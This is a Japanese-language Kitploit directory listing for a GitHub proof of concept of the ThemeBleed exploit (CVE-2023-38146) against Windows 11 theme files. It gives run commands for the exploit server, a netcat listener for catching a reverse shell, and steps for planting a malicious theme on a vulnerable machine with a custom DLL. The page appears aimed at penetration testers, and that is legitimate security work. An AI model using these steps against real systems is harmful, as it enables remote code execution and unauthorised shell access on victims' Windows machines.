Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38146-Poc — より良いPOC | Kitploit
ツール/GitHubGitHub/ch0ico/cve-2023-38146-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubch0ico/cve-2023-38146-poc

CVE-2023-38146-Poc

より良いPOC

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ThemeBleed CVE-2023-38146 エクスプロイト (Windows 11 テーマ) の PoC

https://github.com/gabe-k/themebleed に大きく触発されました。これは Windows でのみ動作するため、自分で作成することにしました。

impacket の smbserver.py から修正したコードを使用しています (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)

参考: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs

ブログ記事: https://jnns.de/posts/cve-2023-38146-poc/

使用方法:

依存関係をインストールしてアプリケーションを実行します:

root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711

脆弱なマシンで "evil_theme.theme" または "evil_theme.themepack" を使用します。

完了!

カスタム DLL ファイル:

エクスポートされた関数 "VerifyThemeVersion" を含む DLL を "./td/" フォルダに "Aero.msstyles_vrf_evil.dll" という名前で配置します。Google で検索するか、私の例 https://github.com/Jnnshschl/ThemeBleedReverseShellDLL を使用して、サンプル DLL を見つけてください。

root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
ツールをダウンロード